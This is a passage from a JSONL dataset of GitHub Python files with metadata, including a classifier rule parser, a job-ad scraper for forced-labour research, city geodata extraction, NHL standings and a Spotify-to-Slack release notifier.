"service_framework.broker.rabbit_broker_async.RabbitBrokerAsync", "line_number": 188, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 189, "usage_type": "name"}, {"api_name": "service_framework.base_handler.BaseHandler", "line_number": 189, "usage_type": "name"}, {"api_name": "asyncio.get_event_loop", "line_number": 198, "usage_type": "call"}, {"api_name": "signal.SIGHUP", "line_number": 199, "usage_type": "attribute"}, {"api_name": "signal.SIGTERM", "line_number": 199, "usage_type": "attribute"}, {"api_name": "signal.SIGINT", "line_number": 199, "usage_type": "attribute"}, {"api_name": "asyncio.Task.all_tasks", "line_number": 213, "usage_type": "call"}, {"api_name": "asyncio.Task", "line_number": 213, "usage_type": "attribute"}, {"api_name": "asyncio.tasks.Task.current_task", "line_number": 214, "usage_type": "call"}, {"api_name": "asyncio.tasks", "line_number": 214, "usage_type": "attribute"}, {"api_name": "contextlib.suppress", "line_number": 216, "usage_type": "call"}, {"api_name": "asyncio.exceptions", "line_number": 216, "usage_type": "attribute"}, {"api_name": "asyncio.gather", "line_number": 223, "usage_type": "call"}, {"api_name": "service_framework.base_service.BaseService", "line_number": 238, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 281, "usage_type": "call"}]} +{"seq_id": "5242241312", "text": "from pathlib import Path\nfrom typing import List, Tuple\n\nimport attr\nimport numpy as np\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True, hash=True, cache_hash=True, eq=True)\nclass FeatureTest:\n feature_index: int\n lower_bound: float\n upper_bound: float\n\n def covers(self, dataset_instance: np.ndarray) -> bool:\n return self.lower_bound <= dataset_instance[self.feature_index] < self.upper_bound\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True, hash=True, cache_hash=True, eq=True)\nclass Rule:\n antecedent: List[FeatureTest]\n consequent: np.ndarray\n\n def covers(self, dataset_instance: np.ndarray) -> bool:\n return all((ft.covers(dataset_instance) for ft in self.antecedent))\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True, hash=True, cache_hash=True, eq=True)\nclass Individual:\n rules: List[Rule]\n\n\ndef parse_feature_test(raw: str) -> FeatureTest:\n lower_bound, tail = raw.split(' <= ')\n _, tail = tail.split('x[')\n feature_index, upper_bound = tail.split('] < ')\n\n feature_index = int(feature_index)\n\n if lower_bound == '-∞':\n lower_bound = float('-inf')\n else:\n lower_bound = float(lower_bound)\n\n if upper_bound == '∞':\n upper_bound = float('inf')\n else:\n upper_bound = float(upper_bound)\n\n return FeatureTest(feature_index=feature_index, lower_bound=lower_bound, upper_bound=upper_bound)\n\n\ndef parse_rule(raw: str, feature_count: int, class_count: int) -> Rule:\n fields = raw.split(',')\n fields = [f for f in fields if f]\n\n antecedent = (parse_feature_test(ft) for ft in fields[:feature_count])\n antecedent = list(sorted(antecedent, key=lambda ft: ft.feature_index))\n\n consequent = [bool(f) for f in fields[feature_count:]]\n\n if len(consequent) != class_count:\n raise Exception\n\n consequent = np.asarray(consequent)\n\n return Rule(antecedent=antecedent, consequent=consequent)\n\n\ndef get_feature_count_and_class_count(raw_rule: str) -> Tuple[int, int]:\n feature_count = raw_rule.count('[')\n fields = raw_rule.split(',')\n fields = [f for f in fields if f]\n class_count = len(fields) - feature_count\n\n return feature_count, class_count\n\n\ndef parse_individual(raw: str) -> Individual:\n lines = 
raw.split('\\n')\n\n    # Remove header and footer\n    rule_lines = lines[1:-1]\n\n    feature_count, class_count = get_feature_count_and_class_count(raw_rule=rule_lines[0])\n    rules = [parse_rule(raw=rl, feature_count=feature_count, class_count=class_count)\n             for rl in rule_lines]\n\n    return Individual(rules=rules)\n\n\ndef main():\n    test = Path(r\"T:\\Source\\minotaur_msc_def_analysis\\minotaur_output\\run-0-dataset-CAL500-fold-0-output\\model-888.csv\")\n    ind = parse_individual(test.read_text(encoding='UTF8'))\n    print(ind)\n\n\nif __name__ == '__main__':\n    main()\n", "repo_name": "Mirandatz/minotaur_msc_def_analysis", "sub_path": "minotaur_modeling.py", "file_name": "minotaur_modeling.py", "file_ext": "py", "file_size_in_byte": 2830, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.ndarray", "line_number": 14, "usage_type": "attribute"}, {"api_name": "attr.s", "line_number": 8, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 23, "usage_type": "attribute"}, {"api_name": "attr.s", "line_number": 18, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 29, "usage_type": "name"}, {"api_name": "attr.s", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 64, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 69, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "8361670284", "text": "from QCandyUi.CandyWindow import *\nfrom common.path import BasePath\n\n\ndef set_my_theme(widget, theme):\n    \"\"\"Set the theme.\"\"\"\n    theme_file = BasePath.THEME_FILE\n    if os.path.isfile(theme_file):\n        path = theme_file\n    else:\n        path = (os.path.split(__file__)[0] + '\\\\' + theme_file).replace('\\\\', '/')\n    theme_dict = json.load(open(path))\n    # the theme set in theme.json takes priority over the theme passed to setTheme\n    config_theme = theme_dict.get('theme')\n    if config_theme is None or config_theme == '' or theme_dict.get(config_theme) is None:\n        color_dict = theme_dict.get(theme)\n    else:\n        color_dict = theme_dict.get(config_theme)\n    if color_dict is None:\n        qss = simple_qss.getDefaultQss()\n    else:\n        qss = simple_qss.getQss(color_dict['fontLight'], color_dict['fontDark'], color_dict['normal'],\n                                color_dict['light'], color_dict['deep'], color_dict['disLight'],\n                                color_dict['disDark'], theme)\n    widget.setStyleSheet(qss)\n", "repo_name": "ckxingchen/QuickMacro", "sub_path": "runapp/utils/theme.py", "file_name": "theme.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "common.path.BasePath.THEME_FILE", "line_number": 7, "usage_type": "attribute"}, {"api_name": "common.path.BasePath", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "2815328630", "text": "from pathlib import Path\nimport logging\n\ndef create_log_file(tmp_path,sensor, suffix):\n    fp = tmp_path + \"/\" + sensor + \"_\" + suffix\n    if not Path(fp).is_file():\n        f = open(fp,\"w+\")\n        f.write(\"0\")\n        f.close()\n    f = open(fp,\"r\")\n    fd = f.read()\n    logging.debug(\"File \" + sensor + \"_\" + suffix + \" created\")\n    return fp\n\ndef FileContent(file):\n    f = open(file,\"r\")\n    fd = f.read()\n    logging.debug(\"File Data (\" + file + \"): \" + fd )\n    return int(fd)\n\ndef WriteData(file,value):\n    f = 
open(file,\"w\") \n f.write(str(value))", "repo_name": "ktt-ol/floodsensor", "sub_path": "software_docker/LogFile.py", "file_name": "LogFile.py", "file_ext": "py", "file_size_in_byte": 550, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 6, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "17417498735", "text": "import datetime\n\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nimport re\n\n\n# run `scrapy crawl locanto_other2` in the Forced-Labour-Detection-IBM\\Web Scraper\\scrapy_eg\\scrapy_eg\\spiders> folder\n# NOTE: delete csv file before running the spider\nclass LocantoSpider(CrawlSpider):\n name = \"locanto\" # unique identifier for the spider\n # allowed_domains = [\"www.locanto.ie\"] # limits the crawl to this domain list\n start_urls = [\"https://www.locanto.ie/Customer-Service-Call-Centre/618/\"] # first url(s) to crawl\n # Crawling rules\n rules = (\n # use the parse() function on pages whose links match \".../ID_(number)/...\" within the \"entries\" cs class\n # e.g. https://dublin.locanto.ie/ID_4964952094/Window-blinds-installer.html\n # will match if it's in the list of entries on the page\n\n # get all jobs in this section. No locanto mobile pages or redirects.\n Rule(LinkExtractor(allow=\"locanto.ie/Customer-Service-Call-Centre/618/\", deny=[\"m.locanto\", \"mobile_redirect\"])),\n Rule(LinkExtractor(allow=\"locanto.ie/ID_\", restrict_css=\".entries\"), callback=\"parse\"),\n )\n\n def parse(self, response):\n title = response.css(\".header-text::text\").get() # extract the title\n ad_id = response.css(\".vap_ad_id::text\").get() # extract the ad id\n # format ad id\n ad_id = ad_id.replace(\"Ad ID: \", \"\")\n ad_id = ad_id.replace(\"\\n\", \"\")\n\n desc = response.xpath(\"//div[@itemprop='description']//text()\").getall() # extract the entire description\n desc = \" \".join(desc) # join the description into a single string\n desc = desc.replace(\"’\", \"\\'\") # fix the unicode apostrophe, to be safe\n desc = re.sub(\"\\s+\", \" \", desc) # remove extra whitespace\n desc = desc.replace(\"About the Position\", \"\") # remove the About the Position text\n desc = desc.replace(\" \", \" \") # remove the \" \" character\n desc = desc.encode(\"utf-8\") # convert to utf-8, just to be safe\n desc = desc.strip() # remove leading and trailing whitespace\n\n # NOTE: NOT ALL ADS HAVE A USERNAME\n # username = response.css(\".vap_sidebox_username::text\").get() # extract the username\n # username = username.replace(\"\\n\", \"\") # format username\n\n # extract the location\n city = response.xpath(\"//div[@itemprop='address']/span[@itemprop='addressLocality']/text()\").get()\n country = response.xpath(\"//div[@itemprop='address']/span[@itemprop='addressCountry']/text()\").get()\n\n # extract ad sector\n breadcrumbs = response.xpath(\"//div[@class='breadcrumb_item']/a/text()\").getall()\n length = len(breadcrumbs)\n sector = breadcrumbs[length-1] # sector is the last breadcrumb on the ad page in locanto\n sector = sector.replace(\"\\n\", \"\") # format sector\n sector = sector.rsplit(\" \", 1)[0] # remove the last word, which is just a location\n if \"County\" in sector:\n sector = sector.replace(\"County\", \"\") # remove the County from the sector\n if \"Dún\" in sector:\n sector = 
sector.replace(\"Dún\", \"\")  # remove the Dún from the sector (e.g. if Dún Laoghaire is the location)\n        sector = sector.strip()  # remove leading and trailing whitespace\n\n        # NOTE: PHONE NUMBER REQUIRES A LOGGED IN ACCOUNT\n        # NOTE: LOCANTO AD POSTED DATE IS RELATIVE TO TODAY'S DATE, NO SPECIFIC DATE (e.g. \"Posted a week ago\")\n        yield {\n            \"title\": title,\n            \"ad_id\": ad_id,\n            \"desc\": desc,\n            \"city\": city,\n            \"country\": country,\n            \"date\": datetime.datetime.now().strftime(\"%Y-%m-%d\"),  # placeholder date is the day the scraper is run\n            \"sector\": sector\n        }\n", "repo_name": "johnamcgrath/Forced-Labour-Detection-IBM", "sub_path": "Web Scraper/scrapy_eg/scrapy_eg/spiders/locanto.py", "file_name": "locanto.py", "file_ext": "py", "file_size_in_byte": 3801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.spiders.CrawlSpider", "line_number": 10, "usage_type": "name"}, {"api_name": "scrapy.spiders.Rule", "line_number": 21, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 21, "usage_type": "call"}, {"api_name": "scrapy.spiders.Rule", "line_number": 22, "usage_type": "call"}, {"api_name": "scrapy.linkextractors.LinkExtractor", "line_number": 22, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "attribute"}]} +{"seq_id": "13983062688", "text": "\"\"\" city_data.py\nCity data to be extracted into csv files.\n\"\"\"\nimport extract_data as etd\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\nimport time\nimport optparse\n\ndata_path = '../../datasets/'\n\ndef parseOptions():\n    optParser = optparse.OptionParser()\n    optParser.add_option('-c', '--plotcity',action='store',\n                         metavar=\"C\", type='string',dest='plot_city',default=None,\n                         help='City to be plotted (case sensitive; options are any city in our database (Boston, Los Angeles, Tokyo, Beijing, etc.)' )\n    optParser.add_option('-w', '--worldclim',action='store_true',\n                         dest='worldclim',default=False,\n                         help='Extract WorldClim data stored at \"{}\"'.format(data_path + 'worldclim'))\n    optParser.add_option('-p', '--paleoclim',action='store_true',\n                         dest='paleoclim',default=False,\n                         help='Extract PaleoClim data stored at \"{}\"'.format(data_path + 'paleoclim'))\n    optParser.add_option('-l', '--landscan',action='store_true',\n                         dest='landscan',default=False,\n                         help='Extract Landscan data stored at \"{}\"'.format(data_path + 'landscan'))\n    optParser.add_option('-b', '--brightness',action='store_true',\n                         dest='brightness',default=False,\n                         help='Extract Sky Brightness data stored at \"{}\"'.format(data_path + 'brightness'))\n    optParser.add_option('-r', '--roads',action='store_true',\n                         dest='roads',default=False,\n                         help='Extract road density data stored at \"{}\"'.format(data_path + 'roads'))\n    optParser.add_option('-m', '--human',action='store_true',\n                         dest='human',default=False,\n                         help='Extract human modification data stored at \"{}\"'.format(data_path + 'human_modification'))\n    optParser.add_option('-u', '--urban_heat',action='store_true',\n                         dest='urban_heat',default=False,\n                         help='Extract urban heat data stored at \"{}\"'.format(data_path + 'roads'))\n    optParser.add_option('-y', '--land_use',action='store_true',\n                         dest='land_use',default=False,\n                         help='Extract land use 
data stored at \"{}\"'.format(data_path + 'land_use'))\n optParser.add_option('-e', '--elevation',action='store_true',\n dest='elevation',default=False,\n help='Extract elevation data stored at \"{}\"'.format(data_path + 'elevation'))\n optParser.add_option('-g', '--geodist',action='store_true',\n dest='geodist',default=False,\n help='Output geographical distances between cities as a .csv contingency table.')\n opts, args = optParser.parse_args()\n\n return opts\n\n\nif __name__ == '__main__':\n\n opts = parseOptions()\n gdf = gpd.read_file('../../city-boundaries/ne_10m_urban_areas_landscan.shp')\n cities = pd.DataFrame({'City' : gdf['name_conve']})\n os.makedirs(data_path + '/csv_data', exist_ok=True)\n # get data for all cities.\n if not opts.plot_city is None:\n # plotting a city\n ind = np.where(cities.values == opts.plot_city)[0][0]\n poly = gdf.geometry[ind]\n if not poly.is_valid:\n poly = poly.buffer(0)\n etd.plotCity(poly, title='Plot of the city boundaries of {}'.format(opts.plot_city))\n plt.savefig('../figures/{}_bounds.png'.format(opts.plot_city))\n if opts.worldclim:\n # plot city with worldclim pixels\n tifs, file_names = etd.openTifsInDirectory(data_path + '/worldclim/')\n long_res = tifs[0].GetGeoTransform()[1]\n lat_res = tifs[0].GetGeoTransform()[5]\n # get only chunk of tif files that could be within city bounds\n y_bounds = etd.convertLatToIndex(np.array([poly.bounds[1], poly.bounds[3]]), tifs[0])\n x_bounds = etd.convertLongToIndex(np.array([poly.bounds[0], poly.bounds[2]]), tifs[0])\n df = etd.tifsToDF(tifs, chunkx=int(abs(x_bounds[1]-x_bounds[0])+1), chunky=int(abs(y_bounds[1]-y_bounds[0])+1), offsetx=int(min(x_bounds)), offsety=int(min(y_bounds)))\n df[(df < -3e30)] = None # Remove Rows that have negative numbers as population sizes.\n df = df.dropna()\n etd.plotCity(poly, pixels=df, res=[long_res,lat_res],\n title='WorldClim Pixel (5 arcmin resolution) Intersections for {}'.format(opts.plot_city))\n plt.savefig('../figures/{}_worldclim_pixels_5m.png'.format(opts.plot_city))\n \n if opts.paleoclim:\n # plot city with paleoclim pixels\n tifs, file_names = etd.openTifsInDirectory(data_path + '/paleoclim/')\n long_res = tifs[0].GetGeoTransform()[1]\n lat_res = tifs[0].GetGeoTransform()[5]\n # get only chunk of tif files that could be within city bounds\n y_bounds = etd.convertLatToIndex(np.array([poly.bounds[1], poly.bounds[3]]), tifs[0])\n x_bounds = etd.convertLongToIndex(np.array([poly.bounds[0], poly.bounds[2]]), tifs[0])\n df = etd.tifsToDF(tifs, chunkx=int(abs(x_bounds[1]-x_bounds[0])+1), chunky=int(abs(y_bounds[1]-y_bounds[0])+1), offsetx=int(min(x_bounds)), offsety=int(min(y_bounds)))\n df[(df < -3e30)] = None # Remove Rows that have negative numbers as population sizes.\n df = df.dropna()\n etd.plotCity(poly, pixels=df, res=[long_res,lat_res],\n title='PaleoClim Pixel (5 arcmin resolution) Intersections for {}'.format(opts.plot_city))\n plt.savefig('../figures/{}_paleoclim_pixels_5m.png'.format(opts.plot_city))\n \n if opts.landscan:\n # plot city with landscan pixels\n # landscan uses tifs with different dimensions, so these should graphed twice.\n tifs, file_names = etd.openTifsInDirectory(data_path + '/landscan/')\n for i,t in enumerate(tifs):\n # tifs[0] would represent the year 2000 in the directory in our case\n year = file_names[i][-8:-4]\n long_res = t.GetGeoTransform()[1]\n lat_res = t.GetGeoTransform()[5]\n # get only chunk of tif files that could be within city bounds\n y_bounds = etd.convertLatToIndex(np.array([poly.bounds[1], poly.bounds[3]]), 
t)\n x_bounds = etd.convertLongToIndex(np.array([poly.bounds[0], poly.bounds[2]]), t)\n df = etd.tifsToDF([t], chunkx=int(abs(x_bounds[1]-x_bounds[0])+1), chunky=int(abs(y_bounds[1]-y_bounds[0])+1), offsetx=int(min(x_bounds)), offsety=int(min(y_bounds)))\n df[(df[0] < 0)] = None # Remove Rows that have negative numbers as population sizes.\n df = df.dropna()\n etd.plotCity(poly, pixels=df, res=[long_res,lat_res],\n title='Landscan Population Pixel Intersections for {} in the year {} (resolution 30 arcsec)'.format(opts.plot_city, year))\n plt.savefig('../figures/{}_landscan_pixels_{}_30s.png'.format(opts.plot_city, year))\n plt.show()\n else:\n conts = gpd.read_file('../../continent-boundaries/ne_50m_geography_regions_polys.shp')\n conts = conts[conts['SCALERANK'] == 0]\n # Find what continent each city resides in.\n cont_list = etd.getContinents(gdf, conts)\n cities = pd.DataFrame({'City' : gdf['name_conve'], 'Region' : cont_list})\n if opts.worldclim:\n # get all cities worldclim data\n df = etd.worldclimCityData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/worldclim_cities.csv',index=False)\n if opts.paleoclim:\n # get all cities paleoclim data\n df = etd.paleoclimCityData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/paleoclim_cities.csv',index=False)\n if opts.landscan:\n # get all cities landscan data\n df = etd.landscanCityData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/landscan_cities.csv',index=False)\n if opts.brightness:\n # get all cities brightness data\n df = etd.brightnessData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/brightness_cities.csv',index=False)\n if opts.roads:\n # get all cities road density data\n df = etd.roadData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/roads_cities.csv',index=False)\n if opts.human:\n # get all cities human modification data\n df = etd.humanModificationData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/human_mod_cities.csv',index=False)\n if opts.urban_heat:\n # get all cities urban heat data\n df = etd.urbanHeatData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/urban_heat_cities.csv',index=False)\n if opts.land_use:\n # get all cities land usage data\n df = etd.landUseData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/land_use_cities.csv',index=False)\n if opts.elevation:\n # get all cities elevation data\n df = etd.elevationData(gdf)\n df = pd.merge(cities,df,left_index=True,right_index=True)\n df.to_csv(data_path + 'csv_data/elevation_cities.csv',index=False)\n if opts.geodist:\n # get geographical distances between cities\n cen = gdf.geometry.to_crs(3857).centroid # city centroids\n df = pd.DataFrame((cen.x , cen.y)).T\n city_dists = np.zeros(shape=(len(cen), len(cen))) # Distances of each city from each city\n for i, row in df.iterrows():\n city_dists[i, :] = np.sqrt(np.sum((row.values - df.values) ** 2, axis=1))\n city_dists = city_dists / 1000 # distances in km\n pd.merge(cities[['City', 'Region']], pd.DataFrame(city_dists, columns=cities['City']),\n left_index=True,right_index=True).to_csv('../cluster_data/geo_dists.csv',index=False)", "repo_name": "karechiga/world-cities-analysis", "sub_path": 
"code/city_data.py", "file_name": "city_data.py", "file_ext": "py", "file_size_in_byte": 10659, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "optparse.OptionParser", "line_number": 16, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 59, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 64, "usage_type": "call"}, {"api_name": "extract_data.plotCity", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "extract_data.openTifsInDirectory", "line_number": 72, "usage_type": "call"}, {"api_name": "extract_data.convertLatToIndex", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "extract_data.convertLongToIndex", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "extract_data.tifsToDF", "line_number": 78, "usage_type": "call"}, {"api_name": "extract_data.plotCity", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "extract_data.openTifsInDirectory", "line_number": 87, "usage_type": "call"}, {"api_name": "extract_data.convertLatToIndex", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 91, "usage_type": "call"}, {"api_name": "extract_data.convertLongToIndex", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "extract_data.tifsToDF", "line_number": 93, "usage_type": "call"}, {"api_name": "extract_data.plotCity", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "extract_data.openTifsInDirectory", "line_number": 103, "usage_type": "call"}, {"api_name": "extract_data.convertLatToIndex", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "extract_data.convertLongToIndex", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 111, "usage_type": "call"}, {"api_name": "extract_data.tifsToDF", "line_number": 112, "usage_type": "call"}, {"api_name": "extract_data.plotCity", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "geopandas.read_file", "line_number": 120, "usage_type": "call"}, {"api_name": "extract_data.getContinents", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 124, "usage_type": "call"}, {"api_name": "extract_data.worldclimCityData", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.merge", 
"line_number": 128, "usage_type": "call"}, {"api_name": "extract_data.paleoclimCityData", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 133, "usage_type": "call"}, {"api_name": "extract_data.landscanCityData", "line_number": 137, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 138, "usage_type": "call"}, {"api_name": "extract_data.brightnessData", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 143, "usage_type": "call"}, {"api_name": "extract_data.roadData", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 148, "usage_type": "call"}, {"api_name": "extract_data.humanModificationData", "line_number": 152, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 153, "usage_type": "call"}, {"api_name": "extract_data.urbanHeatData", "line_number": 157, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 158, "usage_type": "call"}, {"api_name": "extract_data.landUseData", "line_number": 162, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 163, "usage_type": "call"}, {"api_name": "extract_data.elevationData", "line_number": 167, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 168, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 176, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 178, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 178, "usage_type": "call"}]} +{"seq_id": "3207363972", "text": "from typing import Dict, Tuple\n\ncat2children = {}\n\n\ndef cat_dfs(parent: str, cat2sdq_tuple: Dict[str, Tuple[str, float]]):\n children = cat2children.get(parent, [])\n parent_intent = cat2sdq_tuple.get(parent)\n child_intents = []\n for child in children:\n child_intent = cat_dfs(child, cat2sdq_tuple)\n if child_intent:\n child_intents.append(child_intent)\n if parent_intent is None:\n return child_intents\n intents = []\n for child_intent in child_intents:\n if child_intent[1] - parent_intent >= -1e-3:\n intents.append(child_intent)\n return intents if intents else [parent_intent]\n\n\n", "repo_name": "foreverxujiahuan/algorithm", "sub_path": "dfs/cat_dfs.py", "file_name": "cat_dfs.py", "file_ext": "py", "file_size_in_byte": 650, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 6, "usage_type": "name"}]} +{"seq_id": "33802124577", "text": "import helpers\nimport json\n\n\ndef get_standings():\n \"\"\"\n Get the current standing as per the NHL\n \n :return: Json of teams\n \"\"\"\n response = helpers.get_page(\"https://statsapi.web.nhl.com/api/v1/standings\")\n\n return json.loads(response)\n\n\ndef parse_json(standings):\n \"\"\"\n Parse the standing json\n \n :param standings: json of standings\n \n :return: dict \n \"\"\"\n team_standings = dict()\n\n for division in standings['records']:\n for team in division['teamRecords']:\n team_standings[helpers.TEAMS[team['team']['name'].upper()]] = {\n 'team': helpers.TEAMS[team['team']['name'].upper()],\n \"ROW\": team['leagueRecord']['wins'] * 2 + team['leagueRecord']['ot'],\n 'points': 
team['leagueRecord']['wins'] * 2 + team['leagueRecord']['ot'],\n \"GD\": team['goalsScored'] - team['goalsAgainst'],\n 'round_1': 0,\n 'round_2': 0,\n 'round_3': 0,\n 'round_4': 0,\n 'champion': 0\n }\n\n return team_standings\n\n\ndef scrape_todays_standings():\n \"\"\"\n Scrapes standings as of today\n \n :return: dictionary: keys -> teams, value -> {wins, ot}\n \"\"\"\n return parse_json(get_standings())\n\n\ndef main():\n print(json.dumps(scrape_todays_standings(), indent=2))\n\n\nif __name__ == \"__main__\":\n main()", "repo_name": "HarryShomer/OffsideReview-Stats", "sub_path": "season_projections/todays_standings.py", "file_name": "todays_standings.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "helpers.get_page", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}, {"api_name": "helpers.TEAMS", "line_number": 28, "usage_type": "attribute"}, {"api_name": "helpers.TEAMS", "line_number": 29, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "2584467579", "text": "import json\nimport datetime\nfrom dotenv import dotenv_values\n\nfrom spotify import Spotify\nfrom slack import Slack\n\ndef main():\n config = dotenv_values(\".env\")\n slack_url_album_global = config[\"SLACK_WEBHOOK_URL_ALBUM_GLOBAL\"]\n slack_url_single_global = config[\"SLACK_WEBHOOK_URL_SINGLE_GLOBAL\"]\n slack_url_album_japan = config[\"SLACK_WEBHOOK_URL_ALBUM_JAPAN\"]\n slack_url_single_japan = config[\"SLACK_WEBHOOK_URL_SINGLE_JAPAN\"]\n\n client_id = config[\"SPOTIFY_CLIENT_ID\"]\n client_secret = config[\"SPOTIFY_CLIENT_SECRET\"]\n\n spotify = Spotify()\n spotify.authorize(client_id, client_secret)\n\n new_releases_japan = spotify.get_new_releases_by_country(\"JP\")\n albums_japan, singles_japan = separate_releases_into_albums_and_singles(new_releases_japan)\n print(f\"released today in Japan: albums: {len(albums_japan)}, singles: {len(singles_japan)}\")\n notify_new_releases_album(albums_japan, slack_url_album_japan) \n notify_new_releases_single(singles_japan, slack_url_single_japan)\n\n new_releases = spotify.get_new_releases_global()\n albums_global, singles_global = separate_releases_into_albums_and_singles(new_releases)\n print(f\"released today in global: albums: {len(albums_global)}, singles: {len(singles_global)}\")\n notify_new_releases_album(albums_global, slack_url_album_global)\n notify_new_releases_single(singles_global, slack_url_single_global)\n\ndef get_combined_artists_name(artists):\n artists_buff = []\n for i, artist in enumerate(artists):\n artists_buff.append(artist[\"name\"])\n artists = \", \".join(artists_buff)\n return artists\n\ndef separate_releases_into_albums_and_singles(items):\n d_today = datetime.date.today()\n # d_today = \"2022-03-18\"\n print(d_today)\n albums = []\n singles = []\n\n for item in items:\n # print(item[\"release_date\"])\n if str(d_today) != item[\"release_date\"]:\n continue\n\n if item[\"album_type\"] == \"album\":\n albums.append(item)\n continue\n elif item[\"album_type\"] == \"single\":\n singles.append(item)\n continue\n else:\n print(f\"unknown album_type?: {item['album_type']}\")\n 